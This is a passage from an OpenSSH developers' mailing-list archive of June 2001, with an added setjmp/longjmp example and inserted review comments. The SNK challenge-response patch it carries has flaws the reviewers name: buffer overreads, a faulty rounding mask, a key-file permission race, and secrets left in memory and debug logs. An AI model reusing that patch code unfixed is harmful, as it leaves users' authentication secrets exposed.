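Markus's suggestion carried through in code, as an added example that is not ssh-keyscan's source: a small stand-in for fatal() and fatal_add_cleanup(), a cleanup callback that longjmp()s back into the scan loop while `nonfatal_fatal` is set, and a scan_host() that survives a fatal() raised during a (simulated) key exchange and lets the caller move on to the next host. The do_kex() failure rule and the host names are assumptions made for the demonstration.

```c
#include <setjmp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef void (*cleanup_fn)(void *);

/* Stand-in for OpenSSH's fatal_add_cleanup()/fatal() pair: fatal() runs the
 * registered callbacks, most recent first, and then exits the program. */
static struct { cleanup_fn fn; void *arg; } cleanups[8];
static int ncleanups;

void fatal_add_cleanup(cleanup_fn fn, void *arg)
{
    if (ncleanups < 8) {
        cleanups[ncleanups].fn = fn;
        cleanups[ncleanups].arg = arg;
        ncleanups++;
    }
}

void fatal(const char *msg)
{
    int i;

    fprintf(stderr, "fatal: %s\n", msg);
    for (i = ncleanups - 1; i >= 0; i--)
        cleanups[i].fn(cleanups[i].arg);
    exit(255);
}

/* The scanner's escape hatch: while a key exchange is in progress nonfatal_fatal
 * is set, and the callback jumps back into the scan loop instead of letting
 * fatal() reach exit(). Outside a key exchange fatal() still terminates. */
static jmp_buf kexjmp;
static volatile int nonfatal_fatal;

static void fatal_callback(void *arg)
{
    (void)arg;
    if (nonfatal_fatal)
        longjmp(kexjmp, -1);
}

/* Stand-in for the real key exchange (an assumption for this example): hosts
 * whose name begins with "bad" fail the way a protocol error would. */
static void do_kex(const char *host)
{
    if (strncmp(host, "bad", 3) == 0)
        fatal("key exchange failed");
}

/* Scan one host. Returns 0 if its key exchange completed and -1 if fatal()
 * fired during it; either way the caller can carry on with the next host. */
int scan_host(const char *host)
{
    static int registered;
    volatile int rc;

    if (!registered) {                /* what ssh-keyscan's main() would do once */
        fatal_add_cleanup(fatal_callback, NULL);
        registered = 1;
    }
    nonfatal_fatal = 1;
    if (setjmp(kexjmp) == 0) {
        do_kex(host);
        rc = 0;
    } else {
        rc = -1;                      /* arrived here via longjmp from fatal_callback */
    }
    nonfatal_fatal = 0;
    return rc;
}

int main(void)
{
    const char *hosts[] = { "good.example", "bad.example", "good2.example" };
    size_t i;

    for (i = 0; i < sizeof(hosts) / sizeof(hosts[0]); i++)
        printf("%s: %s\n", hosts[i], scan_host(hosts[i]) == 0 ? "ok" : "skipped");
    return 0;
}
```

Because fatal() runs the callbacks before exit(), the longjmp() never returns into fatal() and no second copy of fatal() is needed; the one thing to keep in mind is that anything allocated between setjmp() and the failing call is leaked unless the scan loop frees it after the jump.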
From: ecashin at terry.uga.edu (Ed L Cashin) Date: 06 Jun 2001 18:40:03 -0400 Subject: proposal for cosmetic change: prompts Message-ID: Hi. If I submit patches that make the prompts look more like prompts, would those patches be welcome? Before: ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Need passphrase for /home/ecashin/.ssh/id_dsa Enter passphrase for /home/ecashin/.ssh/id_dsa After (model 1): ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Need passphrase for /home/ecashin/.ssh/id_dsa Enter passphrase for "/home/ecashin/.ssh/id_dsa": After (model 2): ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Need passphrase for /home/ecashin/.ssh/id_dsa Enter passphrase for identity (/home/ecashin/.ssh/id_dsa): There's a space after the colon, BTW. If this cosmetic change is desirable, which is preferable, model one or model two? -- --Ed Cashin PGP public key: ecashin at terry.uga.edu http://www.terry.uga.edu/~ecashin/pgp/ From tom at avatar.itc.nrcs.usda.gov Thu Jun 7 08:40:51 2001 
From: tom at avatar.itc.nrcs.usda.gov (Tom Rudnick) Date: Wed, 6 Jun 2001 16:40:51 -0600 (MDT) Subject: HPUX: ssh hangs after shell exit In-Reply-To: from "Kevin Steves" at Jun 05, 2001 04:03:24 PM Message-ID: <200106062240.QAA06761@avatar.itc.nrcs.usda.gov> ... > : > :1) establish connection to sshd using ssh simply via "ssh remote-host" > :2) type exit in interactive shell on remote-host. > :3) "logout" is echoed to the terminal and the local shell prompt is NOT > :echoed. > :4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > :HERE > :5) "Connection to remote-host closed." is echoed to the terminal > :followed by the local shell prompt. > > can you try the patch at the end? hp-ux (and possibly the other systems > you mentioned) restart select() when SA_RESTART which we were setting for > SIGCHLD, and we should not have select() restarted. > > i would also be interested in someone with Unixware trying this so we can > further verify issues with grantpt(), which is why we added the restart > code in the first place. I just built 2.9p1 from the cvs (as of 16:00 MDT) and tested for the hang problem on UnixWare 2.1.3. The problem does not manifest here. Typing exit pauses for about a second, then the session closes. Let me know specifically what you want tested on Unixware and I'll gladly do so. I have Unixware 2.1.3 and 2.03 systems to build on. Unfortunately I have to defer all Unixware 7.x testing to someone else. I'm the guy that asked for SA_RESTART to be added so Protocol 2 would work on Unixware, ...and am very willing to help solve problems so that it remains. :) Thanks, -Tom Rudnick -- ----------------/---------------------------------------------- Tom Rudnick | USDA Natural Resources Conservation Service Fort Collins,CO | tom at avatar.itc.nrcs.usda.gov (970) 295-5427 ** The 3rd Millennium started Jan 1, 2001. 
see: ** ** http://aa.usno.navy.mil/AA/faq/docs/millennium.html ** -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From Darren.Moffat at eng.sun.com Thu Jun 7 09:12:54 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Wed, 6 Jun 2001 16:12:54 -0700 (PDT) Subject: proposal for cosmetic change: prompts Message-ID: <200106062314.f56NESQ308372@jurassic.eng.sun.com> >Before: > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Need passphrase for /home/ecashin/.ssh/id_dsa > Enter passphrase for /home/ecashin/.ssh/id_dsa > >After (model 1): > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Need passphrase for /home/ecashin/.ssh/id_dsa > Enter passphrase for "/home/ecashin/.ssh/id_dsa": > >After (model 2): > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Need passphrase for /home/ecashin/.ssh/id_dsa > Enter passphrase for identity (/home/ecashin/.ssh/id_dsa): > >There's a space after the colon, BTW. If this cosmetic change is >desirable, which is preferable, model one or model two? model 3: ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Enter passphrase for /home/ecashin/.ssh/id_dsa: Why bother saying Need and then Enter since Enter implies Need. -- Darren J Moffat From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 09:22:42 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 01:22:42 +0200 Subject: proposal for cosmetic change: prompts In-Reply-To: <200106062314.f56NESQ308372@jurassic.eng.sun.com>; from Darren.Moffat@eng.sun.com on Wed, Jun 06, 2001 at 04:12:54PM -0700 References: <200106062314.f56NESQ308372@jurassic.eng.sun.com> Message-ID: <20010607012242.A938@faui02.informatik.uni-erlangen.de> On Wed, Jun 06, 2001 at 04:12:54PM -0700, Darren Moffat wrote: > > Need passphrase for /home/ecashin/.ssh/id_dsa > > Enter passphrase for identity (/home/ecashin/.ssh/id_dsa): > > > >There's a space after the colon, BTW. If this cosmetic change is > >desirable, which is preferable, model one or model two? > > model 3: > > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Enter passphrase for /home/ecashin/.ssh/id_dsa: > > > Why bother saying Need and then Enter since Enter implies Need. it was a debugging message, i'll remove it. From ldanna at tislabs.com Thu Jun 7 09:35:21 2001 From: ldanna at tislabs.com (Larry D'Anna) Date: Wed, 6 Jun 2001 19:35:21 -0400 Subject: snk authentication Message-ID: <20010606193521.A22645@clipper.gw.tislabs.com> Here is a little patch against 2.9p1 that performs the SNK (also known as TIS authserv) challenge-response automatically instead of asking the user. hope you find it useful. --larry -------------- next part -------------- diff -NuBw openssh-2.9p1/Makefile.in openssh/Makefile.in --- openssh-2.9p1/Makefile.in Thu Apr 26 20:31:08 2001 +++ openssh/Makefile.in Wed Jun 6 16:15:56 2001
@@ -43,9 +43,9 @@ @NO_SFTP at SFTP_PROGS=sftp-server$(EXEEXT) sftp$(EXEEXT) -TARGETS=ssh$(EXEEXT) sshd$(EXEEXT) ssh-add$(EXEEXT) ssh-keygen$(EXEEXT) ssh-keyscan${EXEEXT} ssh-agent$(EXEEXT) scp$(EXEEXT) $(SFTP_PROGS) +TARGETS=ssh$(EXEEXT) sshd$(EXEEXT) ssh-add$(EXEEXT) ssh-keygen$(EXEEXT) ssh-keyscan${EXEEXT} ssh-agent$(EXEEXT) scp$(EXEEXT) snk$(EXEEXT) $(SFTP_PROGS) -LIBSSH_OBJS=atomicio.o authfd.o authfile.o bufaux.o buffer.o canohost.o channels.o cipher.o cli.o compat.o compress.o crc32.o deattack.o dh.o dispatch.o mac.o hostfile.o key.o kex.o kexdh.o kexgex.o log.o match.o misc.o mpaux.o nchan.o packet.o radix.o rijndael.o entropy.o readpass.o rsa.o ssh-dss.o ssh-rsa.o tildexpand.o ttymodes.o uidswap.o uuencode.o xmalloc.o +LIBSSH_OBJS=atomicio.o authfd.o authfile.o bufaux.o buffer.o canohost.o channels.o cipher.o cli.o compat.o compress.o crc32.o deattack.o dh.o dispatch.o mac.o hostfile.o key.o kex.o kexdh.o kexgex.o log.o match.o misc.o mpaux.o nchan.o packet.o radix.o rijndael.o entropy.o readpass.o rsa.o ssh-dss.o ssh-rsa.o tildexpand.o ttymodes.o uidswap.o uuencode.o xmalloc.o snk.o SSHOBJS= ssh.o sshconnect.o sshconnect1.o sshconnect2.o sshtty.o readconf.o clientloop.o @@ -118,6 +118,9 @@ sftp$(EXEEXT): $(LIBCOMPAT) libssh.a sftp.o sftp-client.o sftp-int.o sftp-common.o sftp-glob.o scp-common.o $(LD) -o $@ sftp.o sftp-client.o sftp-common.o sftp-int.o sftp-glob.o scp-common.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS) + +snk$(EXEEXT): $(LIBCOMPAT) snkmain.o snk.o + $(LD) -o $@ snkmain.o snk.o -lcrypto # test driver for the loginrec code - not built by default logintest: logintest.o $(LIBCOMPAT) libssh.a loginrec.o Common subdirectories: openssh-2.9p1/contrib and openssh/contrib Common subdirectories: openssh-2.9p1/openbsd-compat and openssh/openbsd-compat diff -NuBw openssh-2.9p1/readconf.c openssh/readconf.c --- openssh-2.9p1/readconf.c Tue Apr 17 14:11:37 2001 +++ openssh/readconf.c Wed Jun 6 14:38:23 2001 
@@ -111,7 +111,7 @@ oGlobalKnownHostsFile2, oUserKnownHostsFile2, oPubkeyAuthentication, oKbdInteractiveAuthentication, oKbdInteractiveDevices, oHostKeyAlias, oDynamicForward, oPreferredAuthentications, oHostbasedAuthentication, - oHostKeyAlgorithms + oHostKeyAlgorithms, oSNKFile } OpCodes; /* Textual representations of the tokens. */ @@ -177,6 +177,7 @@ { "dynamicforward", oDynamicForward }, { "preferredauthentications", oPreferredAuthentications }, { "hostkeyalgorithms", oHostKeyAlgorithms }, + { "SNKFile", oSNKFile }, { NULL, 0 } }; @@ -435,6 +436,10 @@ charptr = &options->system_hostfile; goto parse_string; + case oSNKFile: + charptr = &options->snk_keyfile; + goto parse_string; + case oUserKnownHostsFile: charptr = &options->user_hostfile; goto parse_string; @@ -761,6 +766,7 @@ options->num_remote_forwards = 0; options->log_level = (LogLevel) - 1; options->preferred_authentications = NULL; + options->snk_keyfile = NULL; } /* diff -NuBw openssh-2.9p1/readconf.h openssh/readconf.h --- openssh-2.9p1/readconf.h Tue Apr 17 14:11:37 2001 +++ openssh/readconf.h Wed Jun 6 15:07:34 2001 @@ -97,6 +97,8 @@ /* Remote TCP/IP forward requests. */ int num_remote_forwards; Forward remote_forwards[SSH_MAX_FORWARDS_PER_DIRECTION]; + + char *snk_keyfile; /* Path to a file with an encrypted snk key */ } Options; diff -NuBw openssh-2.9p1/snk.c openssh/snk.c --- openssh-2.9p1/snk.c Wed Dec 31 19:00:00 1969 +++ openssh/snk.c Wed Jun 6 19:25:27 2001 
@@ -0,0 +1,176 @@ + + + +/* by Brian Wellington and / or Jeff Cook */ + +#include +#include + +#include +#include + +static int +make_key_sched(char *s, des_cblock k) { + int k0, k1, k2, k3, k4, k5, k6, k7; + int x; + + x = sscanf(s, "%o %o %o %o %o %o %o %o", + &k0, &k1, &k2, &k3, &k4, &k5, &k6, &k7); + if(x != 8) + return(1); + k[0] = k0; + k[1] = k1; + k[2] = k2; + k[3] = k3; + k[4] = k4; + k[5] = k5; + k[6] = k6; + k[7] = k7; + return(0); +} + + + +int do_snk(char *chal, char *pass, char *rbuf) { + des_key_schedule keysched; + des_cblock kblock; + char buf[12]; + char cbuf[12]; + int i; + int j; + unsigned long kval = 0; + + /* set up a key from the shared secret */ + if(make_key_sched(pass,kblock)) { + strcpy(rbuf,"Cannot decode user secret key"); + return(1); + } + for(i=0; i < 64; i++)pass[i]=0; + + des_set_key((des_cblock *)kblock,keysched); + + /* zeroize the entire buffer */ + for(i = 0; i < 9; i++) + buf[i] = '\0'; + strncpy(buf,chal,8); + + /* push it through the rotating knives */ + des_ecb_encrypt((des_cblock *)buf, (des_cblock *)cbuf, keysched, + DES_ENCRYPT); + + /* pull some bits out of the ciphertext into a long */ + for(i=0; i<4; i++) + for(j = 0; j < 8; j++) + kval = (kval << 1) | ((cbuf[i] >> (7 - j)) & 1); + + /* crunch it into a hex string */ + sprintf(buf,"%08lx",kval); + + /* crunch hex to decimal and try that */ + for(i=0; buf[i]; i++) + if(buf[i] == 'a' || buf[i] == 'b' || buf[i] == 'c') + buf[i] = '2'; + else + if(buf[i] == 'd' || buf[i] == 'e' || buf[i] == 'f') + buf[i] = '3'; + strcpy(rbuf, buf); + return(0); +} + +/* Get the DES key from the specified data. 
*/ + +int get_snk_pass(char *pass, char *res, int reslen, char *data) { + des_cblock kblock; + des_key_schedule keysched; + char kbuf[16]; + des_cblock iv; + int i, j; + char *p; + MD5_CTX ctx; + unsigned char digest[16]; + + if(data[0] ){ + des_string_to_key(pass, &kblock); + des_set_key((des_cblock *)kblock, keysched); + p = (char *)&iv; + for(i=0; i < 8; i++)*p++ = 130-i; + + des_cbc_encrypt((des_cblock *)data, (des_cblock *)kbuf, 16l, + keysched, &iv, DES_DECRYPT); + j = (kbuf[8]&0xff) + (kbuf[9]&0xff) * 256; + if( j < 0 || j >=reslen){ + return 1; + } + MD5_Init(&ctx); + MD5_Update(&ctx, (unsigned char *)&kbuf[8], 2); + MD5_Update(&ctx, (unsigned char *)&kbuf[10], (j<=6) ? j : 6); + + strncpy(res, &kbuf[10], 6); + res[6] = '\0'; + j -= 6; + if( j > 0){ + i = (j+7)& 0xf8; + des_cbc_encrypt((des_cblock *)&data[16], + (des_cblock *)&res[6], i*1l, + keysched, &iv, DES_DECRYPT); + MD5_Update(&ctx, (unsigned char *)&res[6], j); + } + res[6+j] = '\0'; + + MD5_Final(digest, &ctx); + for(i=0; i < 8; i++){ + if( digest[i] != (kbuf[i]&0xff)) + return 1; + } + }else{ + strncpy(res, pass, reslen); + } + return 0; +} + + + +int put_snk_pass(char *pass, char *res, int reslen, char *data) { + des_cblock kblock; + des_key_schedule keysched; + char kbuf[16]; + des_cblock iv; + int i, j; + char *p; + MD5_CTX ctx; + unsigned char digest[16]; + + des_string_to_key(pass, &kblock); + des_set_key((des_cblock *)kblock, keysched); + p = (char *)&iv; + for(i=0; i < 8; i++)*p++ = 130-i; + + kbuf[8] = reslen&0xff; + kbuf[9] = (reslen >> 8)&0xff; + for(i=0; i < 6 && i < reslen; i++) + kbuf[10+i] = res[i]; + MD5_Init(&ctx); + MD5_Update(&ctx, (unsigned char *)&kbuf[8], 2); + MD5_Update(&ctx, res, reslen); + MD5_Final(digest, &ctx); + for(i=0; i < 8; i++) + kbuf[i] = digest[i]; + + des_cbc_encrypt((des_cblock *)kbuf, (des_cblock *)data, 16l, + keysched, &iv, DES_ENCRYPT); + j = reslen - 6; + if( j > 0){ + i = (j+7)& 0xf8; + des_cbc_encrypt((des_cblock *)&res[6], (des_cblock *)&data[16], + 
i*1l, keysched, &iv, DES_ENCRYPT); + } + return 0; +} + + +int valid_secret_p (char *s) { + int x, y; + x = sscanf(s, "%o %o %o %o %o %o %o %o", + &y, &y, &y, &y, &y, &y, &y, &y); + return x == 8; +} diff -NuBw openssh-2.9p1/snk.h openssh/snk.h --- openssh-2.9p1/snk.h Wed Dec 31 19:00:00 1969 +++ openssh/snk.h Wed Jun 6 15:56:23 2001 @@ -0,0 +1,9 @@ + + +extern int do_snk(char *, char *, char *); +extern int get_snk_pass(char *pass, char *res, int reslen, char *data); +extern int put_snk_pass(char *pass, char *res, int reslen, char *data); +extern int valid_secret_p (char *s); + + + diff -NuBw openssh-2.9p1/snkmain.c openssh/snkmain.c --- openssh-2.9p1/snkmain.c Wed Dec 31 19:00:00 1969 +++ openssh/snkmain.c Wed Jun 6 19:24:58 2001 
@@ -0,0 +1,256 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "snk.h" + + +/* + * originaly written by Brian Wellington and / or Jeff Cook + * modified by Larry D'Anna + */ + + +#define hexvalue(c) ((tolower(c) < 'a') ? (tolower(c) - '0') : (tolower(c) - 'a' + 10)) + +char *keyfile, *outfile = NULL; + +static void +usage() { + fprintf (stderr, "Usage:\n"); + fprintf (stderr, "snk [-f keyfile] [challenge] Compute response\n"); + fprintf (stderr, "snk -w [-f keyfile] Save Key\n"); + fprintf (stderr, "snk -p [-f keyfile] [-o outfile] Change Passphrase\n"); +} + +void save_snk() { + FILE *fp; + char secret[256]; + char password[256]; + int i,x1,x2,x3,x4,x5,x6,x7,x8; + int y1,y2,y3,y4,y5,y6,y7,y8; + unsigned char data[48]; + + get_key: + strncpy(secret, getpass("Enter SNK secret key: "), sizeof(secret)); + if (sscanf(secret, "%d %d %d %d %d %d %d %d", &x1, &x2, &x3, &x4, &x5, &x6, &x7, &x8) != 8) { + fprintf (stderr, "Error: Invalid secret key\n"); + goto get_key; + } + if (sscanf(getpass("Repeat: "), "%d %d %d %d %d %d %d %d", + &y1, &y2, &y3, &y4, &y5, &y6, &y7, &y8) != 8 || + x1 != y1 || x2 != y2 || x3 != y3 || x4 != y4 || + x5 != y5 || x6 != y6 || x7 != y7 || x8 != y8 ) { + fprintf (stderr, "Keys do not match\n"); + goto get_key; + } + get_password: + strncpy(password, getpass("Enter SNK passphrase: "), sizeof(password)); + if ( strcmp(password, getpass("Repeat: ")) != 0 ) { + fprintf (stderr, "Passphrases do not match\n"); + goto get_password; + } + memset(data, 0, sizeof(data)); + put_snk_pass(password, secret, strlen(secret) + 1, data); + fp = fopen (outfile, "w"); + if (fp == NULL) { + fprintf (stderr, "Error: Cannot create %s\n", keyfile); + exit(1); + } + if ( chmod(keyfile, S_IRUSR|S_IWUSR) == -1 ) + fprintf (stderr, "Error: cannot set permissions on %s\n", keyfile); + for (i=0; ipw_dir) + 10); + snprintf (keyfile, strlen(pwd->pw_dir)+10, "%s/.snk", pwd->pw_dir); + outfile = keyfile; + + while ((ch = 
getopt(argc, argv, "hwpf:o:")) != -1) { + switch (ch) { + case 'w': + if (mode != mDefault) { + fprintf (stderr, "Error: -w and -p may only be used once.\n"); + return 1; + } + mode = mWrite; + break; + case 'p': + if (mode != mDefault) { + fprintf (stderr, "Error: -w and -p may only be used once.\n"); + return 1; + } + mode = mPasswd; + break; + case 'f': + keyfile = optarg; + break; + case 'o': + outfile = optarg; + break; + case '?': + case 'h': + default: + usage(); + return 1; + } + } + argc -= optind; + argv += optind; + + switch (mode) { + case mWrite: + if (argc != 0) { + usage(); + return 1; + } + save_snk(); + break; + case mPasswd: + if (argc != 0) { + usage(); + return 1; + } + passwd(); + break; + case mDefault: + if (argc == 0) + compute_snk (NULL); + else if ( argc == 1 ) + compute_snk (argv[0]); + else { + usage(); + return 1; + } + break; + } + + return 0; + +} diff -NuBw openssh-2.9p1/sshconnect1.c openssh/sshconnect1.c --- openssh-2.9p1/sshconnect1.c Tue Apr 17 14:08:16 2001 +++ openssh/sshconnect1.c Wed Jun 6 17:57:41 2001 @@ -43,6 +43,8 @@ #include "readpass.h" #include "cipher.h" #include "canohost.h" +#include "snk.h" + /* Session id for the current session. */ u_char session_id[16]; @@ -611,6 +613,8 @@ #endif /* AFS */ +#define hexvalue(c) ((tolower(c) < 'a') ? (tolower(c) - '0') : (tolower(c) - 'a' + 10)) + /* * Tries to authenticate with any string-based challenge/response system. * Note that the client code is not tied to s/key or TIS. @@ -624,6 +628,9 @@ char prompt[1024]; char *challenge, *response; + char *octchal, *p, *q; + + debug("Doing challenge reponse authentication."); for (i = 0; i < options.number_of_password_prompts; i++) { 
@@ -644,6 +651,51 @@ } challenge = packet_get_string(&clen); packet_integrity_check(payload_len, (4 + clen), type); + + if (options.snk_keyfile != NULL) { + FILE *fp; + int len; + unsigned char data[48]; + char secret[256]; + char *password; + + octchal = (char *) xmalloc (clen); + memset (octchal, 0, clen); + for (p = challenge, q = octchal; *p; p++) + if ('0' <= *p && *p <= '9') + *q++ = *p; + debug ("SNK challenge is %s", octchal); + + fp = fopen (options.snk_keyfile, "r"); + if (fp == NULL) { + debug ("Cannot open SNK keyfile: %s", options.snk_keyfile); + return 0; + } + len = 0; + memset(data, 0, sizeof(data)); + while (len < sizeof(data)) { + int c1 = fgetc(fp); + int c2 = fgetc(fp); + if (c1 == '\n' || c1 == EOF || c2 == '\n' || c2 == EOF) + break; + data[len++] = (hexvalue(c1) << 4 ) + hexvalue(c2); + } + fclose(fp); + + get_snk_pass("", secret, sizeof(secret), data); + if (! valid_secret_p(secret) ) { + password = read_passphrase("Enter passphrase for SNK secret:", 0); + get_snk_pass(password, secret, sizeof(secret), data); + xfree (password); + if (! valid_secret_p(secret) ) { + error("Cannot decode user SNK secret"); + return 0; + } + } + response = (char *) xmalloc (256); + do_snk(octchal, secret, response); + debug ("SNK response is %s", response); + } else { snprintf(prompt, sizeof prompt, "%s%s", challenge, strchr(challenge, '\n') ? "" : "\nResponse: "); xfree(challenge); @@ -657,6 +709,7 @@ xfree(response); break; } + } packet_start(SSH_CMSG_AUTH_TIS_RESPONSE); ssh_put_password(response); memset(response, 0, strlen(response)); From tim at multitalents.net Thu Jun 7 12:10:23 2001 
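Review bot: the new `snk$(EXEEXT)` rule in the second Makefile.in hunk links with a bare `-lcrypto` and omits `$(LDFLAGS)` and `$(LIBS)`, so an OpenSSL or library path handed to configure never reaches this link step, unlike every other target (compare `$(LD) -o $@ sftp.o ... $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS)` just above it); it also names `$(LIBCOMPAT)` as a prerequisite without linking it. Suggest `$(LD) -o $@ snkmain.o snk.o $(LDFLAGS) -lopenbsd-compat -lcrypto $(LIBS)`.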
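Review bot: `{ "SNKFile", oSNKFile }` in the second readconf.c hunk breaks the all-lowercase convention of the keyword table (`"hostkeyalgorithms"`, `"preferredauthentications"` on the neighbouring lines), and the new `SNKFile` option is not documented anywhere in the patch; suggest `{ "snkfile", oSNKFile }` plus a ssh_config(5) entry that says the file is the one written by `snk -w` and must be readable only by the user.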
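Review bot: in snk.c, `get_snk_pass()` bounds the length word `j = (kbuf[8]&0xff) + (kbuf[9]&0xff) * 256` only against `reslen`, never against the size of the ciphertext buffer, yet the second `des_cbc_encrypt()` reads `i = (j+7)& 0xf8` bytes starting at `&data[16]` while every caller in this patch hands in a 48-byte `data[]`; a truncated or tampered key file therefore drives the decrypt well past the end of `data`. The `& 0xf8` mask is itself wrong: it keeps only eight bits, so for a remaining length above 248 `i` wraps to a small value, `put_snk_pass()` silently writes no ciphertext for the tail and `get_snk_pass()` then hashes uninitialised bytes of `res`. Suggest passing the size of `data` in, rounding with `(j + 7) & ~7`, and rejecting any `j` for which `16 + i` exceeds that size. Separately, `do_snk()` wipes the secret with a fixed `for(i=0; i < 64; i++)pass[i]=0;` regardless of how large the caller's buffer really is; wipe `strlen(pass)` bytes, or take the length as a parameter.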
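Review bot: in snkmain.c, `save_snk()` validates the secret with `sscanf(secret, "%d %d ...")` while snk.c parses it with `%o` in both `make_key_sched()` and `valid_secret_p()`, so a secret containing an 8 or a 9 is accepted at save time and rejected at use time; call `valid_secret_p()` here instead. The key file is created with `fopen(outfile, "w")` under the default umask and only afterwards `chmod(keyfile, S_IRUSR|S_IWUSR)`, which leaves a window in which the freshly written secret is readable by others and, when `-o outfile` differs from `keyfile`, changes the mode of the wrong file (the error messages name `keyfile` too); use `open(outfile, O_WRONLY|O_CREAT|O_TRUNC, S_IRUSR|S_IWUSR)` followed by `fdopen()`. `strncpy(secret, getpass(...), sizeof(secret))` also does not guarantee a terminator before `strlen(secret)` is taken, and `data[48]` only has room for a secret of up to 38 bytes including the terminator, which nothing checks before `put_snk_pass()` is called.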
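Review bot: the `hexvalue()` macro added in the second sshconnect1.c hunk duplicates the identical macro in snkmain.c, and for any character that is not a hex digit it yields an out-of-range value rather than an error; define it once in snk.h, or better as a small function in snk.c that returns -1 for non-hex input so callers can reject a corrupt key file.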
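Review bot: the new `debug("Doing challenge reponse authentication.");` in the third sshconnect1.c hunk misspells "response".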
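Review bot: in the `options.snk_keyfile != NULL` branch of the fourth sshconnect1.c hunk, `octchal` is allocated with `clen` bytes and then filled with every digit of the challenge, so a challenge made up only of digits leaves no room for the terminating NUL and `debug("SNK challenge is %s", octchal)` reads past the allocation; allocate `clen + 1`. The decoded `secret` and the `password` are never cleared before the function returns (only `response` gets the `memset(response, 0, strlen(response))` in the existing code), `debug("SNK response is %s", response)` writes the one-time response into the debug log, and the key-file loop feeds whatever `fgetc()` returns to `hexvalue()` without an `isxdigit()` check. `octchal` is also leaked on every path, and the `fopen()` failure path returns without freeing `challenge`.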
From: tim at multitalents.net (Tim Rice)
Date: Wed, 6 Jun 2001 19:10:23 -0700 (PDT)
Subject: HPUX: ssh hangs after shell exit
In-Reply-To: <200106062240.QAA06761@avatar.itc.nrcs.usda.gov>
Message-ID:

On Wed, 6 Jun 2001, Tom Rudnick wrote:

> ...
> > :
> > :1) establish connection to sshd using ssh simply via "ssh remote-host"
> > :2) type exit in interactive shell on remote-host.
> > :3) "logout" is echoed to the terminal and the local shell prompt is NOT
> > :echoed.
> > :4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS
> > :HERE
> > :5) "Connection to remote-host closed." is echoed to the terminal
> > :followed by the local shell prompt.
> >
> > can you try the patch at the end? hp-ux (and possibly the other systems
> > you mentioned) restart select() when SA_RESTART which we were setting for
> > SIGCHLD, and we should not have select() restarted.
> >
> > i would also be interested in someone with Unixware trying this so we can
> > further verify issues with grantpt(), which is why we added the restart
> > code in the first place.
> >
> I just built 2.9p1 from the cvs (as of 16:00 MDT) and tested for the
> hang problem on UnixWare 2.1.3.
>
> The problem does not manifest here. Typing exit pauses for about a second,
> then the session closes.

True enough. Just for fun I tried the patch on my 2.03 box.
The patch breaks protocol 2 support quite nicely. ;-)
(stty modes are not correct, therefore can not use the shell)

> Let me know specifically what you want tested on Unixware and I'll
> gladly do so. I have Unixware 2.1.3 and 2.03 systems to build on.
> Unfortunately I have to defer all Unixware 7.x testing to someone else.
>
> I'm the guy that asked for SA_RESTART to be added so Protocol 2 would
> work on Unixware, ...and am very willing to help solve problems so that
> it remains. :)
>
> Thanks,
> -Tom Rudnick
>

--
Tim Rice                Multitalents    (707) 887-1469
tim at multitalents.net

From tim at multitalents.net Thu Jun 7 13:52:26 2001
From: tim at multitalents.net (Tim Rice)
Date: Wed, 6 Jun 2001 20:52:26 -0700 (PDT)
Subject: SSH connection hanging on logout
In-Reply-To: <20010511005244.A16114@faui02.informatik.uni-erlangen.de>
Message-ID:

On Fri, 11 May 2001, Markus Friedl wrote:

> On Thu, May 10, 2001 at 05:29:40PM -0500, mouring at etoh.eviladmin.org wrote:
> > > hermione/home/jason-634: date ; ssh localhost 'sleep 20& exit' ; date
> > > Thu May 10 15:01:54 PDT 2001
> > > Thu May 10 15:02:14 PDT 2001
> > >
> >
> > Is this really a valid test?
>
> no
>
> > This hangs for 20 seconds under OpenBSD
> > also, but this is not what we are referring to. SSH into your FreeBSD box
> > using an interactive shell then do: sleep 20&exit
>
> please, could someone with a system where:
>     $ ssh -t host
>     % sleep 1234 &
>     % exit
>     $
> hangs with openssh try whether rlogin hangs, too?

Platform              SSH hangs    Rlogin hangs
Solaris 7             Y            N
UnixWare 2.03         Y            N
UnixWare 2.13         Y            N
UnixWare 7.1.0        Y            N
SCO Open Server 3     Y            N
SCO Open Server 5     Y            N
Redhat 6.2            Y            N
Caldera eServer 2.3   Y            N

Hmm, I've got source to Linux.

> if rlogin does not hang, could you please check the source of rlogin
> and try to figure out how it handles the filedescriptors that connect
> rlogind to the shell. what happens with the filedescriptors after the
> shell dies?

Nothing is jumping out at me. If you'd like to see for yourself,
ftp://ftp.multitalents.net/pub/netkit-rsh-0.10.tgz (~50K)
has rlogin/rlogind source in it.

> thanks, -m

--
Tim Rice                Multitalents    (707) 887-1469
tim at multitalents.net

From ajf_nylorac at acm.org Sun Jun 10 09:48:06 2001
From: ajf_nylorac at acm.org (Albert John FitzPatrick III)
Date: Sat, 9 Jun 2001 19:48:06 -0400 (EDT)
Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1
Message-ID:

diff -u -r -N openssh-2.9p1/channels.c openssh-2.9p1-ajf.1/channels.c
--- openssh-2.9p1/channels.c	Tue Apr 17 14:14:35 2001
+++ openssh-2.9p1-ajf.1/channels.c	Wed Jun  6 23:25:36 2001
